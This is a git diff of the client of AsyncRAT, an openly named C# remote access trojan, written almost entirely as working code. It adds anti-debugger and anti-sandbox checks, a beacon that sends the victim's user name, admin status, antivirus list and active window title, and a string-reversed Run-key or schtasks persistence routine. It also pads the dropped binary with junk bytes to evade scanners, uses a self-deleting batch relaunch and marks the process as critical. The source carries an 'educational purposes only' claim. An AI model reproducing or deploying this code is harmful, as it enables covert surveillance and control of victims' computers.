private static bool IsSmallDisk()
@ -42,10 +39,14 @@ namespace Client.Helper
private static bool IsXP()
{
if (new Microsoft.VisualBasic.Devices.ComputerInfo().OSFullName.ToLower().Contains("xp"))
try
{
return true;
if (new Microsoft.VisualBasic.Devices.ComputerInfo().OSFullName.ToLower().Contains("xp"))
{
return true;
}
}
catch { }
return false;
}
@ -77,23 +78,32 @@ namespace Client.Helper
private static bool DetectDebugger()
{
bool isDebuggerPresent = false;
CheckRemoteDebuggerPresent(Process.GetCurrentProcess().Handle, ref isDebuggerPresent);
return isDebuggerPresent;
try
{
NativeMethods.CheckRemoteDebuggerPresent(Process.GetCurrentProcess().Handle, ref isDebuggerPresent);
return isDebuggerPresent;
}
catch
{
return isDebuggerPresent;
}
}
private static bool DetectSandboxie()
{
if (GetModuleHandle("SbieDll.dll").ToInt32() != 0)
return true;
else
try
{
if (NativeMethods.GetModuleHandle("SbieDll.dll").ToInt32() != 0)
return true;
else
return false;
}
catch
{
return false;
}
}
[DllImport("kernel32.dll")]
public static extern IntPtr GetModuleHandle(string lpModuleName);
[DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
static extern bool CheckRemoteDebuggerPresent(IntPtr hProcess, ref bool isDebuggerPresent);
}
}

41
AsyncRAT-C#/Client/Helper/CheckMiner.cs Normal file
View File

@ -0,0 +1,41 @@
using System.Diagnostics;
using System.Linq;
using System.Management;
namespace Client.Helper
{
class CheckMiner
{
public string GetProcess()
{
foreach (var process in Process.GetProcesses())
{
try
{
if (GetCommandLine(process).ToLower().Contains("--donate-level="))
{
SetRegistry.SetValue(Settings.Hwid, "1");
return "1";
}
}
catch { }
}
SetRegistry.SetValue(Settings.Hwid, "0");
return "0";
}
public string GetCommandLine(Process process)
{
try
{
using (ManagementObjectSearcher searcher = new ManagementObjectSearcher("SELECT CommandLine FROM Win32_Process WHERE ProcessId = " + process.Id))
using (ManagementObjectCollection objects = searcher.Get())
{
return objects.Cast<ManagementBaseObject>().SingleOrDefault()?["CommandLine"]?.ToString();
}
}
catch { }
return "";
}
}
}

37
AsyncRAT-C#/Client/Helper/HwidGen.cs Normal file
View File

@ -0,0 +1,37 @@
using System;
using System.Collections.Generic;
using System.IO;
using System.Linq;
using System.Security.Cryptography;
using System.Text;
namespace Client.Helper
{
public static class HwidGen
{
public static string HWID()
{
try
{
return GetHash(string.Concat(Environment.ProcessorCount, Environment.UserName,
Environment.MachineName, Environment.OSVersion
, new DriveInfo(Path.GetPathRoot(Environment.SystemDirectory)).TotalSize));
}
catch
{
return "Err HWID";
}
}
public static string GetHash(string strToHash)
{
MD5CryptoServiceProvider md5Obj = new MD5CryptoServiceProvider();
byte[] bytesToHash = Encoding.ASCII.GetBytes(strToHash);
bytesToHash = md5Obj.ComputeHash(bytesToHash);
StringBuilder strResult = new StringBuilder();
foreach (byte b in bytesToHash)
strResult.Append(b.ToString("x2"));
return strResult.ToString().Substring(0, 20).ToUpper();
}
}
}

31
AsyncRAT-C#/Client/Helper/IdSender.cs Normal file
View File

@ -0,0 +1,31 @@
using MessagePackLib.MessagePack;
using Microsoft.VisualBasic.Devices;
using System;
using System.IO;
using System.Windows.Forms;
namespace Client.Helper
{
public static class IdSender
{
public static byte[] SendInfo()
{
MsgPack msgpack = new MsgPack();
msgpack.ForcePathObject("Packet").AsString = "ClientInfo";
msgpack.ForcePathObject("HWID").AsString = Settings.Hwid;
msgpack.ForcePathObject("User").AsString = Environment.UserName.ToString();
msgpack.ForcePathObject("OS").AsString = new ComputerInfo().OSFullName.ToString().Replace("Microsoft", null) + " " +
Environment.Is64BitOperatingSystem.ToString().Replace("True", "64bit").Replace("False", "32bit");
msgpack.ForcePathObject("Path").AsString = Application.ExecutablePath;
msgpack.ForcePathObject("Version").AsString = Settings.Version;
msgpack.ForcePathObject("Admin").AsString = Methods.IsAdmin().ToString().ToLower().Replace("true", "Admin").Replace("false", "User");
msgpack.ForcePathObject("Performance").AsString = Methods.GetActiveWindowTitle();
msgpack.ForcePathObject("Pastebin").AsString = Settings.Pastebin;
msgpack.ForcePathObject("Antivirus").AsString = Methods.Antivirus();
msgpack.ForcePathObject("Installed").AsString = new FileInfo(Application.ExecutablePath).LastWriteTime.ToUniversalTime().ToString();
msgpack.ForcePathObject("Pong").AsString = "";
msgpack.ForcePathObject("Group").AsString = Settings.Group;
return msgpack.Encode2Bytes();
}
}
}

118
AsyncRAT-C#/Client/Helper/Methods.cs
View File

@ -1,75 +1,31 @@
using Client.MessagePack;
using Client.Connection;
using Microsoft.VisualBasic.Devices;
using Client.Connection;
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.IO;
using System.Management;
using System.Net.Sockets;
using System.Security.Cryptography;
using System.Security.Principal;
using System.Text;
using System.Threading;
using System.Drawing.Imaging;
using System.Runtime.InteropServices;
using static Client.Helper.NativeMethods;
using System.Text;
using System.IO;
using System.Windows.Forms;
using System.Threading;
namespace Client.Helper
{
static class Methods
public static class Methods
{
public static PerformanceCounter TheCPUCounter { get; } = new PerformanceCounter("Processor", "% Processor Time", "_Total");
public static PerformanceCounter TheMemCounter { get; } = new PerformanceCounter("Memory", "% Committed Bytes In Use");
public static string HWID()
{
StringBuilder sb = new StringBuilder();
sb.Append(Environment.ProcessorCount);
sb.Append(Environment.UserName);
sb.Append(Environment.MachineName);
sb.Append(Environment.OSVersion);
sb.Append(new DriveInfo(Path.GetPathRoot(Environment.SystemDirectory)).TotalSize);
return GetHash(sb.ToString());
}
public static string GetHash(string strToHash)
{
MD5CryptoServiceProvider md5Obj = new MD5CryptoServiceProvider();
byte[] bytesToHash = Encoding.ASCII.GetBytes(strToHash);
bytesToHash = md5Obj.ComputeHash(bytesToHash);
StringBuilder strResult = new StringBuilder();
foreach (byte b in bytesToHash)
strResult.Append(b.ToString("x2"));
return strResult.ToString().Substring(0, 15).ToUpper();
}
private static Mutex _appMutex;
public static bool CreateMutex()
{
bool createdNew;
_appMutex = new Mutex(false, Settings.MTX, out createdNew);
return createdNew;
}
public static void CloseMutex()
{
if (_appMutex != null)
{
_appMutex.Close();
_appMutex = null;
}
}
public static bool IsAdmin()
{
return new WindowsPrincipal(WindowsIdentity.GetCurrent()).IsInRole(WindowsBuiltInRole.Administrator);
}
public static void ClientExit()
public static void ClientOnExit()
{
try
{
if (Convert.ToBoolean(Settings.BDOS) && IsAdmin())
ProcessCritical.Exit();
CloseMutex();
MutexControl.CloseMutex();
ClientSocket.SslClient?.Close();
ClientSocket.TcpClient?.Close();
}
@ -78,34 +34,23 @@ namespace Client.Helper
public static string Antivirus()
{
using (ManagementObjectSearcher antiVirusSearch = new ManagementObjectSearcher(@"\\" + Environment.MachineName + @"\root\SecurityCenter2", "Select * from AntivirusProduct"))
try
{
List<string> av = new List<string>();
foreach (ManagementBaseObject searchResult in antiVirusSearch.Get())
using (ManagementObjectSearcher antiVirusSearch = new ManagementObjectSearcher(@"\\" + Environment.MachineName + @"\root\SecurityCenter2", "Select * from AntivirusProduct"))
{
av.Add(searchResult["displayName"].ToString());
List<string> av = new List<string>();
foreach (ManagementBaseObject searchResult in antiVirusSearch.Get())
{
av.Add(searchResult["displayName"].ToString());
}
if (av.Count == 0) return "N/A";
return string.Join(", ", av.ToArray());
}
if (av.Count == 0) return "None";
return string.Join(", ", av.ToArray());
}
}
public static byte[] SendInfo()
{
MsgPack msgpack = new MsgPack();
msgpack.ForcePathObject("Packet").AsString = "ClientInfo";
msgpack.ForcePathObject("HWID").AsString = HWID();
msgpack.ForcePathObject("User").AsString = Environment.UserName.ToString();
msgpack.ForcePathObject("OS").AsString = new ComputerInfo().OSFullName.ToString().Replace("Microsoft", null) + " " +
Environment.Is64BitOperatingSystem.ToString().Replace("True", "64bit").Replace("False", "32bit");
msgpack.ForcePathObject("Path").AsString = Process.GetCurrentProcess().MainModule.FileName;
msgpack.ForcePathObject("Version").AsString = Settings.Version;
msgpack.ForcePathObject("Admin").AsString = IsAdmin().ToString().ToLower().Replace("true", "Admin").Replace("false", "User");
TheCPUCounter.NextValue();
msgpack.ForcePathObject("Performance").AsString = $"CPU {(int)TheCPUCounter.NextValue()}% RAM {(int)TheMemCounter.NextValue()}%";
msgpack.ForcePathObject("Pastebin").AsString = Settings.Pastebin;
msgpack.ForcePathObject("Antivirus").AsString = Antivirus();
return msgpack.Encode2Bytes();
catch
{
return "N/A";
}
}
public static ImageCodecInfo GetEncoder(ImageFormat format)
@ -122,8 +67,6 @@ namespace Client.Helper
}
[DllImport("kernel32.dll", SetLastError = true)]
public static extern EXECUTION_STATE SetThreadExecutionState(EXECUTION_STATE esFlags);
public static void PreventSleep()
{
try
@ -133,11 +76,20 @@ namespace Client.Helper
catch { }
}
public enum EXECUTION_STATE : uint
public static string GetActiveWindowTitle()
{
ES_CONTINUOUS = 0x80000000,
ES_DISPLAY_REQUIRED = 0x00000002,
ES_SYSTEM_REQUIRED = 0x00000001
try
{
const int nChars = 256;
StringBuilder buff = new StringBuilder(nChars);
IntPtr handle = GetForegroundWindow();
if (GetWindowText(handle, buff, nChars) > 0)
{
return buff.ToString();
}
}
catch { }
return "";
}
}
}

26
AsyncRAT-C#/Client/Helper/MutexControl.cs Normal file
View File

@ -0,0 +1,26 @@
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading;
namespace Client.Helper
{
public static class MutexControl
{
public static Mutex currentApp;
public static bool CreateMutex()
{
currentApp = new Mutex(false, Settings.MTX, out bool createdNew);
return createdNew;
}
public static void CloseMutex()
{
if (currentApp != null)
{
currentApp.Close();
currentApp = null;
}
}
}
}

34
AsyncRAT-C#/Client/Helper/NativeMethods.cs Normal file
View File

@ -0,0 +1,34 @@
using System;
using System.Collections.Generic;
using System.Linq;
using System.Runtime.InteropServices;
using System.Text;
namespace Client.Helper
{
public static class NativeMethods
{
[DllImport("user32.dll")]
public static extern IntPtr GetForegroundWindow();
[DllImport("user32.dll")]
public static extern int GetWindowText(IntPtr hWnd, StringBuilder text, int count);
[DllImport("kernel32.dll")]
public static extern IntPtr GetModuleHandle(string lpModuleName);
[DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
public static extern bool CheckRemoteDebuggerPresent(IntPtr hProcess, ref bool isDebuggerPresent);
[DllImport("kernel32.dll", SetLastError = true)]
public static extern EXECUTION_STATE SetThreadExecutionState(EXECUTION_STATE esFlags);
public enum EXECUTION_STATE : uint
{
ES_CONTINUOUS = 0x80000000,
ES_DISPLAY_REQUIRED = 0x00000002,
ES_SYSTEM_REQUIRED = 0x00000001
}
[DllImport("ntdll.dll", SetLastError = true)]
public static extern void RtlSetProcessIsCritical(UInt32 v1, UInt32 v2, UInt32 v3);
}
}

9
AsyncRAT-C#/Client/Helper/ProcessCritical.cs
View File

@ -20,7 +20,7 @@ namespace Client.Helper
{
SystemEvents.SessionEnding += new SessionEndingEventHandler(SystemEvents_SessionEnding);
Process.EnterDebugMode();
RtlSetProcessIsCritical(1, 0, 0);
Helper.NativeMethods.RtlSetProcessIsCritical(1, 0, 0);
}
catch { }
}
@ -28,7 +28,7 @@ namespace Client.Helper
{
try
{
RtlSetProcessIsCritical(0, 0, 0);
NativeMethods.RtlSetProcessIsCritical(0, 0, 0);
}
catch
{
@ -38,10 +38,5 @@ namespace Client.Helper
}
}
}
#region "Native Methods"
[DllImport("ntdll.dll", SetLastError = true)]
private static extern void RtlSetProcessIsCritical(UInt32 v1, UInt32 v2, UInt32 v3);
#endregion
}
}

89
AsyncRAT-C#/Client/Helper/SetRegistry.cs Normal file
View File

@ -0,0 +1,89 @@
using Client.Handle_Packet;
using Microsoft.Win32;
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
namespace Client.Helper
{
public static class SetRegistry
{
private static readonly string ID = @"Software\" + Settings.Hwid;
/*
* Author : NYAN CAT
* Name : Lime Registry DB
* Contact Me : https:github.com/NYAN-x-CAT
* This program is distributed for educational purposes only.
*/
public static bool SetValue(string name, byte[] value)
{
try
{
using (RegistryKey key = Registry.CurrentUser.CreateSubKey(ID, RegistryKeyPermissionCheck.ReadWriteSubTree))
{
key.SetValue(name, value, RegistryValueKind.Binary);
return true;
}
}
catch (Exception ex)
{
Packet.Error(ex.Message);
}
return false;
}
public static byte[] GetValue(string value)
{
try
{
using (RegistryKey key = Registry.CurrentUser.CreateSubKey(ID))
{
object o = key.GetValue(value);
return (byte[])o;
}
}
catch (Exception ex)
{
Packet.Error(ex.Message);
}
return null;
}
public static bool DeleteValue(string name)
{
try
{
using (RegistryKey key = Registry.CurrentUser.CreateSubKey(ID))
{
key.DeleteValue(name);
return true;
}
}
catch (Exception ex)
{
Packet.Error(ex.Message);
}
return false;
}
public static bool DeleteSubKey()
{
try
{
using (RegistryKey key = Registry.CurrentUser.OpenSubKey("", true))
{
key.DeleteSubKeyTree(ID);
return true;
}
}
catch (Exception ex)
{
Packet.Error(ex.Message);
}
return false;
}
}
}

67
AsyncRAT-C#/Client/ILMerge.props Normal file
View File

@ -0,0 +1,67 @@
<?xml version="1.0" encoding="utf-8" ?>
<Project ToolsVersion="4.0" DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<PropertyGroup>
<!-- -->
<!-- ILMerge project-specific settings. Almost never need to be set explicitly. -->
<!-- for details, see http://research.microsoft.com/en-us/people/mbarnett/ilmerge.aspx -->
<!-- -->
<!-- *** set this file to Type=None, CopyToOutput=Never *** -->
<!-- If True, all copy local dependencies will also be merged from referenced projects whether they are referenced in the current project explicitly or not -->
<ILMergeTransitive>true</ILMergeTransitive>
<!-- Extra ILMerge library paths (semicolon-separated). Dont put your package dependencies here, they will be added automagically -->
<ILMergeLibraryPath></ILMergeLibraryPath>
<!-- The solution NuGet package directory if not standard 'SOLUTION\packages' -->
<ILMergePackagesPath></ILMergePackagesPath>
<!-- The merge order file name if differs from standard 'ILMergeOrder.txt' -->
<ILMergeOrderFile></ILMergeOrderFile>
<!-- The strong key file name if not specified in the project -->
<ILMergeKeyFile></ILMergeKeyFile>
<!-- The assembly version if differs for the version of the main assembly -->
<ILMergeAssemblyVersion></ILMergeAssemblyVersion>
<!-- added in Version 1.0.4 -->
<ILMergeFileAlignment></ILMergeFileAlignment>
<!-- added in Version 1.0.4, default=none -->
<ILMergeAllowDuplicateType></ILMergeAllowDuplicateType>
<!-- If the <see cref="CopyAttributes"/> is also set, any assembly-level attributes names that have the same type are copied over into the target assembly -->
<ILMergeAllowMultipleAssemblyLevelAttributes></ILMergeAllowMultipleAssemblyLevelAttributes>
<!-- See ILMerge documentation -->
<ILMergeAllowZeroPeKind></ILMergeAllowZeroPeKind>
<!-- The assembly level attributes of each input assembly are copied over into the target assembly -->
<ILMergeCopyAttributes></ILMergeCopyAttributes>
<!-- Creates a .pdb file for the output assembly and merges into it any .pdb files found for input assemblies, default=true -->
<ILMergeDebugInfo>false</ILMergeDebugInfo>
<!-- Target assembly will be delay signed -->
<ILMergeDelaySign></ILMergeDelaySign>
<!-- Types in assemblies other than the primary assembly have their visibility modified -->
<ILMergeInternalize></ILMergeInternalize>
<!-- The path name of the file that will be used to identify types that are not to have their visibility modified -->
<ILMergeInternalizeExcludeFile></ILMergeInternalizeExcludeFile>
<!-- XML documentation files are merged to produce an XML documentation file for the target assembly -->
<ILMergeXmlDocumentation></ILMergeXmlDocumentation>
<!-- External assembly references in the manifest of the target assembly will use full public keys (false) or public key tokens (true, default value) -->
<ILMergePublicKeyTokens></ILMergePublicKeyTokens>
<!-- Types with the same name are all merged into a single type in the target assembly -->
<ILMergeUnionMerge></ILMergeUnionMerge>
<!-- The version of the target framework, default 40 (works for 45 too) -->
<ILTargetPlatform></ILTargetPlatform>
</PropertyGroup>
</Project>

4
AsyncRAT-C#/Client/ILMergeOrder.txt Normal file
View File

@ -0,0 +1,4 @@
# this file contains the partial list of the merged assemblies in the merge order
# you can fill it from the obj\CONFIG\PROJECT.ilmerge generated on every build
# and finetune merge order to your satisfaction

72
AsyncRAT-C#/Client/Install/NormalStartup.cs
View File

@ -4,7 +4,6 @@ using Microsoft.Win32;
using System;
using System.Diagnostics;
using System.IO;
using System.Security.Principal;
using System.Threading;
namespace Client.Install
@ -15,49 +14,70 @@ namespace Client.Install
{
try
{
string installfullpath = Path.Combine(Environment.ExpandEnvironmentVariables(Settings.InstallFolder), Settings.InstallFile);
if (Process.GetCurrentProcess().MainModule.FileName != installfullpath)
FileInfo installPath = new FileInfo(Path.Combine(Environment.ExpandEnvironmentVariables(Settings.InstallFolder), Settings.InstallFile));
string currentProcess = Process.GetCurrentProcess().MainModule.FileName;
if (currentProcess != installPath.FullName) //check if payload is running from installation path
{
for (int i = 0; i < 10; i++)
{
Thread.Sleep(1000);
}
foreach (Process P in Process.GetProcesses())
foreach (Process P in Process.GetProcesses()) //kill any process which shares same path
{
try
{
if (P.MainModule.FileName == installfullpath)
if (P.MainModule.FileName == installPath.FullName)
P.Kill();
}
catch
{
Debug.WriteLine("NormalStartup Error : " + P.ProcessName);
}
catch { }
}
using (RegistryKey key = Registry.CurrentUser.OpenSubKey(Strings.StrReverse(@"\nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS"), RegistryKeyPermissionCheck.ReadWriteSubTree))
if (Methods.IsAdmin()) //if payload is runnign as administrator install schtasks
{
key.SetValue(Path.GetFileName(installfullpath), "\"" + installfullpath + "\"");
Process.Start(new ProcessStartInfo
{
FileName = "cmd",
Arguments = "/c schtasks /create /f /sc onlogon /rl highest /tn " + "\"" + Path.GetFileNameWithoutExtension(installPath.Name) + "\"" + " /tr " + "'" + "\"" + installPath.FullName + "\"" + "' & exit",
WindowStyle = ProcessWindowStyle.Hidden,
CreateNoWindow = true,
});
}
else
{
using (RegistryKey key = Registry.CurrentUser.OpenSubKey(Strings.StrReverse(@"\nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS"), RegistryKeyPermissionCheck.ReadWriteSubTree))
{
key.SetValue(Path.GetFileNameWithoutExtension(installPath.Name), "\"" + installPath.FullName + "\"");
}
}
FileStream fs;
if (File.Exists(installfullpath))
if (File.Exists(installPath.FullName))
{
File.Delete(installfullpath);
File.Delete(installPath.FullName);
Thread.Sleep(1000);
}
fs = new FileStream(installfullpath, FileMode.CreateNew);
byte[] clientExe = File.ReadAllBytes(Process.GetCurrentProcess().MainModule.FileName);
fs = new FileStream(installPath.FullName, FileMode.CreateNew);
byte[] clientExe = File.ReadAllBytes(currentProcess);
fs.Write(clientExe, 0, clientExe.Length);
byte[] junk = new byte[new Random().Next(40 * 1024 * 1000, 50 * 1024 * 1000)];
new Random().NextBytes(junk);
fs.Write(junk, 0, junk.Length);
fs.Dispose();
Process.Start(installfullpath);
Methods.ClientExit();
Methods.ClientOnExit();
string batch = Path.GetTempFileName() + ".bat";
using (StreamWriter sw = new StreamWriter(batch))
{
sw.WriteLine("@echo off");
sw.WriteLine("timeout 3 > NUL");
sw.WriteLine("START " + "\"" + "\" " + "\"" + installPath.FullName + "\"");
sw.WriteLine("CD " + Path.GetTempPath());
sw.WriteLine("DEL " + "\"" + Path.GetFileName(batch) + "\"" + " /f /q");
}
Process.Start(new ProcessStartInfo()
{
FileName = batch,
CreateNoWindow = true,
ErrorDialog = false,
UseShellExecute = false,
WindowStyle = ProcessWindowStyle.Hidden
});
Environment.Exit(0);
}
}

39
AsyncRAT-C#/Client/Program.cs
View File

@ -9,46 +9,53 @@ using Client.Helper;
Name : AsyncRAT Simple RAT
Contact Me : https:github.com/NYAN-x-CAT
This program Is distributed for educational purposes only.
This program is distributed for educational purposes only.
*/
namespace Client
{
class Program
public class Program
{
static void Main()
public static void Main()
{
Thread.Sleep(2500);
for (int i = 0; i < Convert.ToInt32(Settings.Delay); i++)
{
Thread.Sleep(1000);
}
if (!Settings.InitializeSettings()) Environment.Exit(0);
try
{
if (!Methods.CreateMutex())
if (!MutexControl.CreateMutex()) //if current payload is a duplicate
Environment.Exit(0);
if (Convert.ToBoolean(Settings.Anti))
if (Convert.ToBoolean(Settings.Anti)) //run anti-virtual environment
Anti_Analysis.RunAntiAnalysis();
if (Convert.ToBoolean(Settings.Install))
if (Convert.ToBoolean(Settings.Install)) //drop payload [persistence]
NormalStartup.Install();
if (Convert.ToBoolean(Settings.BDOS) && Methods.IsAdmin())
if (Convert.ToBoolean(Settings.BDOS) && Methods.IsAdmin()) //active critical process
ProcessCritical.Set();
Methods.PreventSleep();
Methods.PreventSleep(); //prevent pc to idle\sleep
}
catch { }
while (true)
while (true) // ~ loop to check socket status
{
if (!ClientSocket.IsConnected)
try
{
ClientSocket.Reconnect();
ClientSocket.InitializeClient();
if (!ClientSocket.IsConnected)
{
ClientSocket.Reconnect();
ClientSocket.InitializeClient();
}
}
Thread.Sleep(new Random().Next(1000,5000));
catch { }
Thread.Sleep(5000);
}
}
}

3
AsyncRAT-C#/Client/Properties/AssemblyInfo.cs
View File

@ -10,7 +10,7 @@ using System.Runtime.InteropServices;
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyCompany("")]
[assembly: AssemblyProduct("")]
[assembly: AssemblyCopyright("Copyright © 2019")]
[assembly: AssemblyCopyright("")]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyCulture("")]
@ -20,7 +20,6 @@ using System.Runtime.InteropServices;
[assembly: ComVisible(false)]
// The following GUID is for the ID of the typelib if this project is exposed to COM
//[assembly: Guid("c3c49f45-2589-4e04-9c50-71b6035c14ae")]
// Version information for an assembly consists of the following four values:
//

11
AsyncRAT-C#/Client/Settings.cs
View File

@ -1,4 +1,5 @@
using Client.Algorithm;
using Client.Helper;
using System;
using System.IO;
using System.Security.Cryptography;
@ -12,7 +13,7 @@ namespace Client
#if DEBUG
public static string Ports = "6606";
public static string Hosts = "127.0.0.1";
public static string Version = "0.5.3";
public static string Version = "0.5.7B";
public static string Install = "false";
public static string InstallFolder = "AppData";
public static string InstallFile = "Test.exe";
@ -25,6 +26,9 @@ namespace Client
public static Aes256 aes256 = new Aes256(Key);
public static string Pastebin = "null";
public static string BDOS = "false";
public static string Hwid = HwidGen.HWID();
public static string Delay = "0";
public static string Group = "Debug";
#else
public static string Ports = "%Ports%";
@ -42,6 +46,9 @@ namespace Client
public static Aes256 aes256;
public static string Pastebin = "%Pastebin%";
public static string BDOS = "%BDOS%";
public static string Hwid = null;
public static string Delay = "%Delay%";
public static string Group = "%Group%";
#endif
@ -62,6 +69,8 @@ namespace Client
Pastebin = aes256.Decrypt(Pastebin);
Anti = aes256.Decrypt(Anti);
BDOS = aes256.Decrypt(BDOS);
Group = aes256.Decrypt(Group);
Hwid = HwidGen.HWID();
Serversignature = aes256.Decrypt(Serversignature);
ServerCertificate = new X509Certificate2(Convert.FromBase64String(aes256.Decrypt(Certificate)));
return VerifyHash();

28
AsyncRAT-C#/Client/app.manifest Normal file
View File

@ -0,0 +1,28 @@
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges>
<requestedExecutionLevel level="asInvoker" uiAccess="false" />
</requestedPrivileges>
</security>
</trustInfo>
<compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1">
<application>
<!-- Windows Vista -->
<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/>
<!-- Windows 7 -->
<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/>
<!-- Windows 8 -->
<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/>
<!-- Windows 8.1 -->
<supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/>
<!-- Windows 10 -->
<supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"/>
</application>
</compatibility>
<asmv3:application xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" >
<asmv3:windowsSettings xmlns="http://schemas.microsoft.com/SMI/2005/WindowsSettings">
<dpiAware>true</dpiAware>
</asmv3:windowsSettings>
</asmv3:application>
</assembly>

5
AsyncRAT-C#/Client/packages.config Normal file
View File

@ -0,0 +1,5 @@
<?xml version="1.0" encoding="utf-8"?>
<packages>
<package id="ILMerge" version="3.0.29" targetFramework="net40-client" />
<package id="MSBuild.ILMerge.Task" version="1.1.3" targetFramework="net40-client" />
</packages>

2
AsyncRAT-C#/Client/MessagePack/BytesTools.cs → AsyncRAT-C#/MessagePack/MessagePack/BytesTools.cs
View File

@ -4,7 +4,7 @@ using System.Linq;
using System.Text;
using System.Threading.Tasks;
namespace Client.MessagePack
namespace MessagePackLib.MessagePack
{
public class BytesTools
{

17
AsyncRAT-C#/Client/MessagePack/MsgPack.cs → AsyncRAT-C#/MessagePack/MessagePack/MsgPack.cs
View File

@ -1,14 +1,4 @@
/*
* DecodeFormFile函数
* 2015-07-14 16:31:32
*
* ForcePathObject查找不到子对象的bug,(Putree 274638001<spiritring@gmail.com>)
* 2015-07-14 16:32:13
*
* 1270,(Putree 274638001<spiritring@gmail.com>)
* 2015-07-14 15:28:45
*/
using System;
using System;
using System.Collections;
using System.Collections.Generic;
using System.IO;
@ -17,7 +7,7 @@ using System.Text;
using System.Threading.Tasks;
namespace Client.MessagePack
namespace MessagePackLib.MessagePack
{
public class MsgPackEnum : IEnumerator
{
@ -494,6 +484,7 @@ namespace Client.MessagePack
{
using (MemoryStream ms = new MemoryStream())
{
bytes = Zip.Decompress(bytes);
ms.Write(bytes, 0, bytes.Length);
ms.Position = 0;
DecodeFromStream(ms);
@ -835,7 +826,7 @@ namespace Client.MessagePack
byte[] r = new byte[ms.Length];
ms.Position = 0;
ms.Read(r, 0, (int)ms.Length);
return r;
return Zip.Compress(r);
}
}

2
AsyncRAT-C#/Client/MessagePack/MsgPackType.cs → AsyncRAT-C#/MessagePack/MessagePack/MsgPackType.cs
View File

@ -4,7 +4,7 @@ using System.Linq;
using System.Text;
using System.Threading.Tasks;
namespace Client.MessagePack
namespace MessagePackLib.MessagePack
{
public enum MsgPackType
{

2
AsyncRAT-C#/Client/MessagePack/ReadTools.cs → AsyncRAT-C#/MessagePack/MessagePack/ReadTools.cs
View File

@ -5,7 +5,7 @@ using System.Linq;
using System.Text;
using System.Threading.Tasks;
namespace Client.MessagePack
namespace MessagePackLib.MessagePack
{
class ReadTools
{

2
AsyncRAT-C#/Client/MessagePack/WriteTools.cs → AsyncRAT-C#/MessagePack/MessagePack/WriteTools.cs
View File

@ -1,7 +1,7 @@
using System;
using System.IO;
namespace Client.MessagePack
namespace MessagePackLib.MessagePack
{
class WriteTools
{

45
AsyncRAT-C#/MessagePack/MessagePack/Zip.cs Normal file
View File

@ -0,0 +1,45 @@
using System;
using System.IO;
using System.IO.Compression;
namespace MessagePackLib.MessagePack
{
public static class Zip
{
public static byte[] Decompress(byte[] input)
{
using (var source = new MemoryStream(input))
{
byte[] lengthBytes = new byte[4];
source.Read(lengthBytes, 0, 4);
var length = BitConverter.ToInt32(lengthBytes, 0);
using (var decompressionStream = new GZipStream(source,
CompressionMode.Decompress))
{
var result = new byte[length];
decompressionStream.Read(result, 0, length);
return result;
}
}
}
public static byte[] Compress(byte[] input)
{
using (var result = new MemoryStream())
{
var lengthBytes = BitConverter.GetBytes(input.Length);
result.Write(lengthBytes, 0, 4);
using (var compressionStream = new GZipStream(result,
CompressionMode.Compress))
{
compressionStream.Write(input, 0, input.Length);
compressionStream.Flush();
}
return result.ToArray();
}
}
}
}

52
AsyncRAT-C#/MessagePack/MessagePackLib.csproj Normal file
View File

@ -0,0 +1,52 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<Import Project="$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props" Condition="Exists('$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props')" />
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{DC199D9E-CF10-41DD-BBCD-98E71BA8679D}</ProjectGuid>
<OutputType>Library</OutputType>
<AppDesignerFolder>Properties</AppDesignerFolder>
<RootNamespace>MessagePackLib</RootNamespace>
<AssemblyName>MessagePackLib</AssemblyName>
<TargetFrameworkVersion>v4.0</TargetFrameworkVersion>
<FileAlignment>512</FileAlignment>
<Deterministic>true</Deterministic>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<DebugType>none</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="System" />
<Reference Include="System.Core" />
<Reference Include="System.Xml.Linq" />
<Reference Include="System.Data.DataSetExtensions" />
<Reference Include="Microsoft.CSharp" />
<Reference Include="System.Data" />
<Reference Include="System.Xml" />
</ItemGroup>
<ItemGroup>
<Compile Include="MessagePack\BytesTools.cs" />
<Compile Include="MessagePack\MsgPack.cs" />
<Compile Include="MessagePack\MsgPackType.cs" />
<Compile Include="MessagePack\ReadTools.cs" />
<Compile Include="MessagePack\WriteTools.cs" />
<Compile Include="Properties\AssemblyInfo.cs" />
<Compile Include="MessagePack\Zip.cs" />
</ItemGroup>
